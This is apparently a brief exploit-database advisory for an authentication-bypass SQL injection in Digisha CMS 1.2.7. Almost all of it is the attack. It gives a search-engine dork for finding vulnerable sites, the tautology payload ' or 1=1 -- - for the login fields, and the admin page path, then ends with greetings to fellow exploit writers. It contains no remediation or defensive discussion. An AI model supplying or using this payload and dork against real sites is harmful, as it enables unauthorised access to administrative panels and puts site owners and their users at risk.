Headline
Digisha CMS 1.2.7 SQL Injection
Digisha CMS version 1.2.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
====================================================================================================================================| # Title : Digisha CMS V1.2.7 Auth by pass Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : http://www.digisha.com/ | | # Dork : Powered by Digisha |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] http://127.0.0.1/ksminesindiacom/admin/welcome.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================